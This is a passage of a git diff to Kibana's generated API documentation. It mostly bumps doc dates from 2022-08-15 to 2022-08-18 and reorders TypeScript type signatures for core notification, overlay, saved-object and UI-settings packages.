\"onPlayCapture\" | \"onPlaying\" | \"onPlayingCapture\" | \"onProgress\" | \"onProgressCapture\" | \"onRateChange\" | \"onRateChangeCapture\" | \"onSeeked\" | \"onSeekedCapture\" | \"onSeeking\" | \"onSeekingCapture\" | \"onStalled\" | \"onStalledCapture\" | \"onSuspend\" | \"onSuspendCapture\" | \"onTimeUpdate\" | \"onTimeUpdateCapture\" | \"onVolumeChange\" | \"onVolumeChangeCapture\" | \"onWaiting\" | \"onWaitingCapture\" | \"onAuxClick\" | \"onAuxClickCapture\" | \"onClick\" | \"onClickCapture\" | \"onContextMenu\" | \"onContextMenuCapture\" | \"onDoubleClick\" | \"onDoubleClickCapture\" | \"onDrag\" | \"onDragCapture\" | \"onDragEnd\" | \"onDragEndCapture\" | \"onDragEnter\" | \"onDragEnterCapture\" | \"onDragExit\" | \"onDragExitCapture\" | \"onDragLeave\" | \"onDragLeaveCapture\" | \"onDragOver\" | \"onDragOverCapture\" | \"onDragStart\" | \"onDragStartCapture\" | \"onDrop\" | \"onDropCapture\" | \"onMouseDown\" | \"onMouseDownCapture\" | \"onMouseEnter\" | \"onMouseLeave\" | \"onMouseMove\" | \"onMouseMoveCapture\" | \"onMouseOut\" | \"onMouseOutCapture\" | \"onMouseOver\" | \"onMouseOverCapture\" | \"onMouseUp\" | \"onMouseUpCapture\" | \"onSelect\" | \"onSelectCapture\" | \"onTouchCancel\" | \"onTouchCancelCapture\" | \"onTouchEnd\" | \"onTouchEndCapture\" | \"onTouchMove\" | \"onTouchMoveCapture\" | \"onTouchStart\" | \"onTouchStartCapture\" | \"onPointerDown\" | \"onPointerDownCapture\" | \"onPointerMove\" | \"onPointerMoveCapture\" | \"onPointerUp\" | \"onPointerUpCapture\" | \"onPointerCancel\" | \"onPointerCancelCapture\" | \"onPointerEnter\" | \"onPointerEnterCapture\" | \"onPointerLeave\" | \"onPointerLeaveCapture\" | \"onPointerOver\" | \"onPointerOverCapture\" | \"onPointerOut\" | \"onPointerOutCapture\" | \"onGotPointerCapture\" | \"onGotPointerCaptureCapture\" | \"onLostPointerCapture\" | \"onLostPointerCaptureCapture\" | \"onScroll\" | \"onScrollCapture\" | \"onWheel\" | \"onWheelCapture\" | \"onAnimationStart\" | \"onAnimationStartCapture\" | \"onAnimationEnd\" | \"onAnimationEndCapture\" | \"onAnimationIteration\" | \"onAnimationIterationCapture\" | \"onTransitionEnd\" | \"onTransitionEndCapture\" | \"data-test-subj\" | \"hidden\" | \"security\" | \"defaultValue\" | \"defaultChecked\" | \"suppressContentEditableWarning\" | \"suppressHydrationWarning\" | \"accessKey\" | \"contentEditable\" | \"contextMenu\" | \"dir\" | \"draggable\" | \"placeholder\" | \"slot\" | \"spellCheck\" | \"translate\" | \"radioGroup\" | \"about\" | \"datatype\" | \"inlist\" | \"prefix\" | \"property\" | \"resource\" | \"typeof\" | \"vocab\" | \"autoCapitalize\" | \"autoCorrect\" | \"autoSave\" | \"itemProp\" | \"itemScope\" | \"itemType\" | \"itemID\" | \"itemRef\" | \"results\" | \"unselectable\" | \"inputMode\" | \"is\" | \"toastLifeTimeMs\" | \"iconType\" | \"onClose\"> & { title?: string | ", + ", \"children\" | \"onError\" | \"hidden\" | \"color\" | \"className\" | \"onChange\" | \"onKeyDown\" | \"onClick\" | \"security\" | \"defaultValue\" | \"lang\" | \"defaultChecked\" | \"suppressContentEditableWarning\" | \"suppressHydrationWarning\" | \"accessKey\" | \"contentEditable\" | \"contextMenu\" | \"dir\" | \"draggable\" | \"placeholder\" | \"slot\" | \"spellCheck\" | \"style\" | \"tabIndex\" | \"translate\" | \"radioGroup\" | \"role\" | \"about\" | \"datatype\" | \"inlist\" | \"prefix\" | \"property\" | \"resource\" | \"typeof\" | \"vocab\" | \"autoCapitalize\" | \"autoCorrect\" | \"autoSave\" | \"itemProp\" | \"itemScope\" | \"itemType\" | \"itemID\" | \"itemRef\" | \"results\" | \"unselectable\" | \"inputMode\" | \"is\" | \"aria-activedescendant\" | \"aria-atomic\" | \"aria-autocomplete\" | \"aria-busy\" | \"aria-checked\" | \"aria-colcount\" | \"aria-colindex\" | \"aria-colspan\" | \"aria-controls\" | \"aria-current\" | \"aria-describedby\" | \"aria-details\" | \"aria-disabled\" | \"aria-dropeffect\" | \"aria-errormessage\" | \"aria-expanded\" | \"aria-flowto\" | \"aria-grabbed\" | \"aria-haspopup\" | \"aria-hidden\" | \"aria-invalid\" | \"aria-keyshortcuts\" | \"aria-label\" | \"aria-labelledby\" | \"aria-level\" | \"aria-live\" | \"aria-modal\" | \"aria-multiline\" | \"aria-multiselectable\" | \"aria-orientation\" | \"aria-owns\" | \"aria-placeholder\" | \"aria-posinset\" | \"aria-pressed\" | \"aria-readonly\" | \"aria-relevant\" | \"aria-required\" | \"aria-roledescription\" | \"aria-rowcount\" | \"aria-rowindex\" | \"aria-rowspan\" | \"aria-selected\" | \"aria-setsize\" | \"aria-sort\" | \"aria-valuemax\" | \"aria-valuemin\" | \"aria-valuenow\" | \"aria-valuetext\" | \"dangerouslySetInnerHTML\" | \"onCopy\" | \"onCopyCapture\" | \"onCut\" | \"onCutCapture\" | \"onPaste\" | \"onPasteCapture\" | \"onCompositionEnd\" | \"onCompositionEndCapture\" | \"onCompositionStart\" | \"onCompositionStartCapture\" | \"onCompositionUpdate\" | \"onCompositionUpdateCapture\" | \"onFocus\" | \"onFocusCapture\" | \"onBlur\" | \"onBlurCapture\" | \"onChangeCapture\" | \"onBeforeInput\" | \"onBeforeInputCapture\" | \"onInput\" | \"onInputCapture\" | \"onReset\" | \"onResetCapture\" | \"onSubmit\" | \"onSubmitCapture\" | \"onInvalid\" | \"onInvalidCapture\" | \"onLoad\" | \"onLoadCapture\" | \"onErrorCapture\" | \"onKeyDownCapture\" | \"onKeyPress\" | \"onKeyPressCapture\" | \"onKeyUp\" | \"onKeyUpCapture\" | \"onAbort\" | \"onAbortCapture\" | \"onCanPlay\" | \"onCanPlayCapture\" | \"onCanPlayThrough\" | \"onCanPlayThroughCapture\" | \"onDurationChange\" | \"onDurationChangeCapture\" | \"onEmptied\" | \"onEmptiedCapture\" | \"onEncrypted\" | \"onEncryptedCapture\" | \"onEnded\" | \"onEndedCapture\" | \"onLoadedData\" | \"onLoadedDataCapture\" | \"onLoadedMetadata\" | \"onLoadedMetadataCapture\" | \"onLoadStart\" | \"onLoadStartCapture\" | \"onPause\" | \"onPauseCapture\" | \"onPlay\" | \"onPlayCapture\" | \"onPlaying\" | \"onPlayingCapture\" | \"onProgress\" | \"onProgressCapture\" | \"onRateChange\" | \"onRateChangeCapture\" | \"onSeeked\" | \"onSeekedCapture\" | \"onSeeking\" | \"onSeekingCapture\" | \"onStalled\" | \"onStalledCapture\" | \"onSuspend\" | \"onSuspendCapture\" | \"onTimeUpdate\" | \"onTimeUpdateCapture\" | \"onVolumeChange\" | \"onVolumeChangeCapture\" | \"onWaiting\" | \"onWaitingCapture\" | \"onAuxClick\" | \"onAuxClickCapture\" | \"onClickCapture\" | \"onContextMenu\" | \"onContextMenuCapture\" | \"onDoubleClick\" | \"onDoubleClickCapture\" | \"onDrag\" | \"onDragCapture\" | \"onDragEnd\" | \"onDragEndCapture\" | \"onDragEnter\" | \"onDragEnterCapture\" | \"onDragExit\" | \"onDragExitCapture\" | \"onDragLeave\" | \"onDragLeaveCapture\" | \"onDragOver\" | \"onDragOverCapture\" | \"onDragStart\" | \"onDragStartCapture\" | \"onDrop\" | \"onDropCapture\" | \"onMouseDown\" | \"onMouseDownCapture\" | \"onMouseEnter\" | \"onMouseLeave\" | \"onMouseMove\" | \"onMouseMoveCapture\" | \"onMouseOut\" | \"onMouseOutCapture\" | \"onMouseOver\" | \"onMouseOverCapture\" | \"onMouseUp\" | \"onMouseUpCapture\" | \"onSelect\" | \"onSelectCapture\" | \"onTouchCancel\" | \"onTouchCancelCapture\" | \"onTouchEnd\" | \"onTouchEndCapture\" | \"onTouchMove\" | \"onTouchMoveCapture\" | \"onTouchStart\" | \"onTouchStartCapture\" | \"onPointerDown\" | \"onPointerDownCapture\" | \"onPointerMove\" | \"onPointerMoveCapture\" | \"onPointerUp\" | \"onPointerUpCapture\" | \"onPointerCancel\" | \"onPointerCancelCapture\" | \"onPointerEnter\" | \"onPointerEnterCapture\" | \"onPointerLeave\" | \"onPointerLeaveCapture\" | \"onPointerOver\" | \"onPointerOverCapture\" | \"onPointerOut\" | \"onPointerOutCapture\" | \"onGotPointerCapture\" | \"onGotPointerCaptureCapture\" | \"onLostPointerCapture\" | \"onLostPointerCaptureCapture\" | \"onScroll\" | \"onScrollCapture\" | \"onWheel\" | \"onWheelCapture\" | \"onAnimationStart\" | \"onAnimationStartCapture\" | \"onAnimationEnd\" | \"onAnimationEndCapture\" | \"onAnimationIteration\" | \"onAnimationIterationCapture\" | \"onTransitionEnd\" | \"onTransitionEndCapture\" | \"toastLifeTimeMs\" | \"iconType\" | \"onClose\" | \"data-test-subj\"> & { title?: string | ", "MountPoint", " | undefined; text?: string | ", "MountPoint", diff --git a/api_docs/kbn_core_notifications_browser.mdx b/api_docs/kbn_core_notifications_browser.mdx index bbd7b53a71eeb..31b80abeb8b2f 100644 --- a/api_docs/kbn_core_notifications_browser.mdx +++ b/api_docs/kbn_core_notifications_browser.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-notifications-browser title: "@kbn/core-notifications-browser" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-notifications-browser plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-notifications-browser'] --- import kbnCoreNotificationsBrowserObj from './kbn_core_notifications_browser.devdocs.json'; diff --git a/api_docs/kbn_core_notifications_browser_internal.mdx b/api_docs/kbn_core_notifications_browser_internal.mdx index b98f505020ec6..123ef66517165 100644 --- a/api_docs/kbn_core_notifications_browser_internal.mdx +++ b/api_docs/kbn_core_notifications_browser_internal.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-notifications-browser-internal title: "@kbn/core-notifications-browser-internal" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-notifications-browser-internal plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-notifications-browser-internal'] --- import kbnCoreNotificationsBrowserInternalObj from './kbn_core_notifications_browser_internal.devdocs.json'; diff --git a/api_docs/kbn_core_notifications_browser_mocks.mdx b/api_docs/kbn_core_notifications_browser_mocks.mdx index e958ad843e888..c574a847485e1 100644 --- a/api_docs/kbn_core_notifications_browser_mocks.mdx +++ b/api_docs/kbn_core_notifications_browser_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-notifications-browser-mocks title: "@kbn/core-notifications-browser-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-notifications-browser-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-notifications-browser-mocks'] --- import kbnCoreNotificationsBrowserMocksObj from './kbn_core_notifications_browser_mocks.devdocs.json'; diff --git a/api_docs/kbn_core_overlays_browser.devdocs.json b/api_docs/kbn_core_overlays_browser.devdocs.json index 37ccf6337584b..dc76f84740ba1 100644 --- a/api_docs/kbn_core_overlays_browser.devdocs.json +++ b/api_docs/kbn_core_overlays_browser.devdocs.json @@ -293,7 +293,7 @@ "label": "size", "description": [], "signature": [ - "\"s\" | \"m\" | \"l\" | undefined" + "\"m\" | \"s\" | \"l\" | undefined" ], "path": "packages/core/overlays/core-overlays-browser/src/flyout.ts", "deprecated": false diff --git a/api_docs/kbn_core_overlays_browser.mdx b/api_docs/kbn_core_overlays_browser.mdx index 6a4157f533fd3..966b72684ebf4 100644 --- a/api_docs/kbn_core_overlays_browser.mdx +++ b/api_docs/kbn_core_overlays_browser.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-overlays-browser title: "@kbn/core-overlays-browser" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-overlays-browser plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-overlays-browser'] --- import kbnCoreOverlaysBrowserObj from './kbn_core_overlays_browser.devdocs.json'; diff --git a/api_docs/kbn_core_overlays_browser_internal.mdx b/api_docs/kbn_core_overlays_browser_internal.mdx index 44482d0e67407..3138b6a75f20a 100644 --- a/api_docs/kbn_core_overlays_browser_internal.mdx +++ b/api_docs/kbn_core_overlays_browser_internal.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-overlays-browser-internal title: "@kbn/core-overlays-browser-internal" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-overlays-browser-internal plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-overlays-browser-internal'] --- import kbnCoreOverlaysBrowserInternalObj from './kbn_core_overlays_browser_internal.devdocs.json'; diff --git a/api_docs/kbn_core_overlays_browser_mocks.mdx b/api_docs/kbn_core_overlays_browser_mocks.mdx index 450ab00896eef..01e1c7fd5c768 100644 --- a/api_docs/kbn_core_overlays_browser_mocks.mdx +++ b/api_docs/kbn_core_overlays_browser_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-overlays-browser-mocks title: "@kbn/core-overlays-browser-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-overlays-browser-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-overlays-browser-mocks'] --- import kbnCoreOverlaysBrowserMocksObj from './kbn_core_overlays_browser_mocks.devdocs.json'; diff --git a/api_docs/kbn_core_preboot_server.mdx b/api_docs/kbn_core_preboot_server.mdx index b98c9488b9b79..80bf8e728fba4 100644 --- a/api_docs/kbn_core_preboot_server.mdx +++ b/api_docs/kbn_core_preboot_server.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-preboot-server title: "@kbn/core-preboot-server" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-preboot-server plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-preboot-server'] --- import kbnCorePrebootServerObj from './kbn_core_preboot_server.devdocs.json'; diff --git a/api_docs/kbn_core_preboot_server_mocks.mdx b/api_docs/kbn_core_preboot_server_mocks.mdx index 45fb3e004c135..f9273822f0e85 100644 --- a/api_docs/kbn_core_preboot_server_mocks.mdx +++ b/api_docs/kbn_core_preboot_server_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-preboot-server-mocks title: "@kbn/core-preboot-server-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-preboot-server-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-preboot-server-mocks'] --- import kbnCorePrebootServerMocksObj from './kbn_core_preboot_server_mocks.devdocs.json'; diff --git a/api_docs/kbn_core_saved_objects_api_browser.devdocs.json b/api_docs/kbn_core_saved_objects_api_browser.devdocs.json index 84e904ed0d0aa..82b771de6f513 100644 --- a/api_docs/kbn_core_saved_objects_api_browser.devdocs.json +++ b/api_docs/kbn_core_saved_objects_api_browser.devdocs.json @@ -1675,9 +1675,9 @@ "label": "SavedObjectsFindOptions", "description": [], "signature": [ - "{ type: string | string[]; filter?: any; search?: string | undefined; page?: number | undefined; aggs?: Record | undefined; fields?: string[] | undefined; perPage?: number | undefined; sortField?: string | undefined; searchFields?: string[] | undefined; hasReference?: ", + "> | undefined; fields?: string[] | undefined; page?: number | undefined; perPage?: number | undefined; sortField?: string | undefined; searchFields?: string[] | undefined; hasReference?: ", "SavedObjectsFindOptionsReference", " | ", "SavedObjectsFindOptionsReference", diff --git a/api_docs/kbn_core_saved_objects_api_browser.mdx b/api_docs/kbn_core_saved_objects_api_browser.mdx index a476d80171d60..b093ba0d04676 100644 --- a/api_docs/kbn_core_saved_objects_api_browser.mdx +++ b/api_docs/kbn_core_saved_objects_api_browser.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-saved-objects-api-browser title: "@kbn/core-saved-objects-api-browser" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-saved-objects-api-browser plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-saved-objects-api-browser'] --- import kbnCoreSavedObjectsApiBrowserObj from './kbn_core_saved_objects_api_browser.devdocs.json'; diff --git a/api_docs/kbn_core_saved_objects_api_server.mdx b/api_docs/kbn_core_saved_objects_api_server.mdx index b1bc929b5dce4..9ae400347f8e6 100644 --- a/api_docs/kbn_core_saved_objects_api_server.mdx +++ b/api_docs/kbn_core_saved_objects_api_server.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-saved-objects-api-server title: "@kbn/core-saved-objects-api-server" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-saved-objects-api-server plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-saved-objects-api-server'] --- import kbnCoreSavedObjectsApiServerObj from './kbn_core_saved_objects_api_server.devdocs.json'; diff --git a/api_docs/kbn_core_saved_objects_browser.mdx b/api_docs/kbn_core_saved_objects_browser.mdx index 97d899e45810f..5c885e3bafc6c 100644 --- a/api_docs/kbn_core_saved_objects_browser.mdx +++ b/api_docs/kbn_core_saved_objects_browser.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-saved-objects-browser title: "@kbn/core-saved-objects-browser" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-saved-objects-browser plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-saved-objects-browser'] --- import kbnCoreSavedObjectsBrowserObj from './kbn_core_saved_objects_browser.devdocs.json'; diff --git a/api_docs/kbn_core_saved_objects_browser_internal.mdx b/api_docs/kbn_core_saved_objects_browser_internal.mdx index e5b92e6d1a304..e438fba0fadb8 100644 --- a/api_docs/kbn_core_saved_objects_browser_internal.mdx +++ b/api_docs/kbn_core_saved_objects_browser_internal.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-saved-objects-browser-internal title: "@kbn/core-saved-objects-browser-internal" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-saved-objects-browser-internal plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-saved-objects-browser-internal'] --- import kbnCoreSavedObjectsBrowserInternalObj from './kbn_core_saved_objects_browser_internal.devdocs.json'; diff --git a/api_docs/kbn_core_saved_objects_browser_mocks.devdocs.json b/api_docs/kbn_core_saved_objects_browser_mocks.devdocs.json index 8c9a3906a2504..17dd93fd31b18 100644 --- a/api_docs/kbn_core_saved_objects_browser_mocks.devdocs.json +++ b/api_docs/kbn_core_saved_objects_browser_mocks.devdocs.json @@ -90,13 +90,12 @@ "SavedObjectsClientContract", ", savedObject: ", "SavedObject", - ") => ", - "SimpleSavedObjectImpl", - "" + ") => jest.Mocked<", + "SimpleSavedObject", + ">" ], "path": "packages/core/saved-objects/core-saved-objects-browser-mocks/src/simple_saved_object.mock.ts", "deprecated": false, - "returnComment": [], "children": [ { "parentPluginId": "@kbn/core-saved-objects-browser-mocks", @@ -109,7 +108,8 @@ "SavedObjectsClientContract" ], "path": "packages/core/saved-objects/core-saved-objects-browser-mocks/src/simple_saved_object.mock.ts", - "deprecated": false + "deprecated": false, + "isRequired": true }, { "parentPluginId": "@kbn/core-saved-objects-browser-mocks", @@ -123,9 +123,11 @@ "" ], "path": "packages/core/saved-objects/core-saved-objects-browser-mocks/src/simple_saved_object.mock.ts", - "deprecated": false + "deprecated": false, + "isRequired": true } - ] + ], + "returnComment": [] } ], "initialIsOpen": false diff --git a/api_docs/kbn_core_saved_objects_browser_mocks.mdx b/api_docs/kbn_core_saved_objects_browser_mocks.mdx index ef90b38e26312..369f23e5fb5ac 100644 --- a/api_docs/kbn_core_saved_objects_browser_mocks.mdx +++ b/api_docs/kbn_core_saved_objects_browser_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-saved-objects-browser-mocks title: "@kbn/core-saved-objects-browser-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-saved-objects-browser-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-saved-objects-browser-mocks'] --- import kbnCoreSavedObjectsBrowserMocksObj from './kbn_core_saved_objects_browser_mocks.devdocs.json'; diff --git a/api_docs/kbn_core_saved_objects_common.mdx b/api_docs/kbn_core_saved_objects_common.mdx index eb7ed55b31a92..0339d416f73ea 100644 --- a/api_docs/kbn_core_saved_objects_common.mdx +++ b/api_docs/kbn_core_saved_objects_common.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-saved-objects-common title: "@kbn/core-saved-objects-common" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-saved-objects-common plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-saved-objects-common'] --- import kbnCoreSavedObjectsCommonObj from './kbn_core_saved_objects_common.devdocs.json'; diff --git a/api_docs/kbn_core_saved_objects_server.mdx b/api_docs/kbn_core_saved_objects_server.mdx index 92b64df8b2b1e..06b753751b9b8 100644 --- a/api_docs/kbn_core_saved_objects_server.mdx +++ b/api_docs/kbn_core_saved_objects_server.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-saved-objects-server title: "@kbn/core-saved-objects-server" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-saved-objects-server plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-saved-objects-server'] --- import kbnCoreSavedObjectsServerObj from './kbn_core_saved_objects_server.devdocs.json'; diff --git a/api_docs/kbn_core_test_helpers_deprecations_getters.mdx b/api_docs/kbn_core_test_helpers_deprecations_getters.mdx index 6f3fcfa3ae5c1..3375249b36daf 100644 --- a/api_docs/kbn_core_test_helpers_deprecations_getters.mdx +++ b/api_docs/kbn_core_test_helpers_deprecations_getters.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-test-helpers-deprecations-getters title: "@kbn/core-test-helpers-deprecations-getters" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-test-helpers-deprecations-getters plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-test-helpers-deprecations-getters'] --- import kbnCoreTestHelpersDeprecationsGettersObj from './kbn_core_test_helpers_deprecations_getters.devdocs.json'; diff --git a/api_docs/kbn_core_test_helpers_http_setup_browser.mdx b/api_docs/kbn_core_test_helpers_http_setup_browser.mdx index d1578d26f614b..1468cd77f9620 100644 --- a/api_docs/kbn_core_test_helpers_http_setup_browser.mdx +++ b/api_docs/kbn_core_test_helpers_http_setup_browser.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-test-helpers-http-setup-browser title: "@kbn/core-test-helpers-http-setup-browser" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-test-helpers-http-setup-browser plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-test-helpers-http-setup-browser'] --- import kbnCoreTestHelpersHttpSetupBrowserObj from './kbn_core_test_helpers_http_setup_browser.devdocs.json'; diff --git a/api_docs/kbn_core_theme_browser.mdx b/api_docs/kbn_core_theme_browser.mdx index 3d553bba1b7bb..89410d56c3973 100644 --- a/api_docs/kbn_core_theme_browser.mdx +++ b/api_docs/kbn_core_theme_browser.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-theme-browser title: "@kbn/core-theme-browser" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-theme-browser plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-theme-browser'] --- import kbnCoreThemeBrowserObj from './kbn_core_theme_browser.devdocs.json'; diff --git a/api_docs/kbn_core_theme_browser_internal.mdx b/api_docs/kbn_core_theme_browser_internal.mdx index 2d02aae90e284..93b61d9860ce2 100644 --- a/api_docs/kbn_core_theme_browser_internal.mdx +++ b/api_docs/kbn_core_theme_browser_internal.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-theme-browser-internal title: "@kbn/core-theme-browser-internal" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-theme-browser-internal plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-theme-browser-internal'] --- import kbnCoreThemeBrowserInternalObj from './kbn_core_theme_browser_internal.devdocs.json'; diff --git a/api_docs/kbn_core_theme_browser_mocks.mdx b/api_docs/kbn_core_theme_browser_mocks.mdx index d3b9b23443bd1..3892c424f0402 100644 --- a/api_docs/kbn_core_theme_browser_mocks.mdx +++ b/api_docs/kbn_core_theme_browser_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-theme-browser-mocks title: "@kbn/core-theme-browser-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-theme-browser-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-theme-browser-mocks'] --- import kbnCoreThemeBrowserMocksObj from './kbn_core_theme_browser_mocks.devdocs.json'; diff --git a/api_docs/kbn_core_ui_settings_browser.mdx b/api_docs/kbn_core_ui_settings_browser.mdx index 65b0c99f6012b..64ed23a22fbc8 100644 --- a/api_docs/kbn_core_ui_settings_browser.mdx +++ b/api_docs/kbn_core_ui_settings_browser.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-ui-settings-browser title: "@kbn/core-ui-settings-browser" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-ui-settings-browser plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-ui-settings-browser'] --- import kbnCoreUiSettingsBrowserObj from './kbn_core_ui_settings_browser.devdocs.json'; diff --git a/api_docs/kbn_core_ui_settings_browser_internal.mdx b/api_docs/kbn_core_ui_settings_browser_internal.mdx index 9235473a6948f..8b84bcd28230a 100644 --- a/api_docs/kbn_core_ui_settings_browser_internal.mdx +++ b/api_docs/kbn_core_ui_settings_browser_internal.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-ui-settings-browser-internal title: "@kbn/core-ui-settings-browser-internal" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-ui-settings-browser-internal plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-ui-settings-browser-internal'] --- import kbnCoreUiSettingsBrowserInternalObj from './kbn_core_ui_settings_browser_internal.devdocs.json'; diff --git a/api_docs/kbn_core_ui_settings_browser_mocks.mdx b/api_docs/kbn_core_ui_settings_browser_mocks.mdx index c109ec63a2c17..a7dc51baa7a43 100644 --- a/api_docs/kbn_core_ui_settings_browser_mocks.mdx +++ b/api_docs/kbn_core_ui_settings_browser_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-ui-settings-browser-mocks title: "@kbn/core-ui-settings-browser-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-ui-settings-browser-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-ui-settings-browser-mocks'] --- import kbnCoreUiSettingsBrowserMocksObj from './kbn_core_ui_settings_browser_mocks.devdocs.json'; diff --git a/api_docs/kbn_core_ui_settings_common.devdocs.json b/api_docs/kbn_core_ui_settings_common.devdocs.json index 439a926b8f4e0..f74eb88611721 100644 --- a/api_docs/kbn_core_ui_settings_common.devdocs.json +++ b/api_docs/kbn_core_ui_settings_common.devdocs.json @@ -151,7 +151,7 @@ "array of permitted values for this setting" ], "signature": [ - "number[] | string[] | undefined" + "string[] | number[] | undefined" ], "path": "packages/core/ui-settings/core-ui-settings-common/src/ui_settings.ts", "deprecated": false @@ -374,7 +374,7 @@ "\nA sub-set of {@link UiSettingsParams} exposed to the client-side." ], "signature": [ - "{ metric?: { type: string; name: string; } | undefined; type?: ", + "{ options?: string[] | number[] | undefined; type?: ", { "pluginId": "@kbn/core-ui-settings-common", "scope": "common", @@ -382,7 +382,7 @@ "section": "def-common.UiSettingsType", "text": "UiSettingsType" }, - " | undefined; name?: string | undefined; order?: number | undefined; value?: unknown; description?: string | undefined; options?: number[] | string[] | undefined; category?: string[] | undefined; optionLabels?: Record | undefined; requiresPageReload?: boolean | undefined; readonly?: boolean | undefined; sensitive?: boolean | undefined; deprecation?: ", + " | undefined; metric?: { type: string; name: string; } | undefined; value?: unknown; description?: string | undefined; name?: string | undefined; order?: number | undefined; category?: string[] | undefined; optionLabels?: Record | undefined; requiresPageReload?: boolean | undefined; readonly?: boolean | undefined; sensitive?: boolean | undefined; deprecation?: ", { "pluginId": "@kbn/core-ui-settings-common", "scope": "common", diff --git a/api_docs/kbn_core_ui_settings_common.mdx 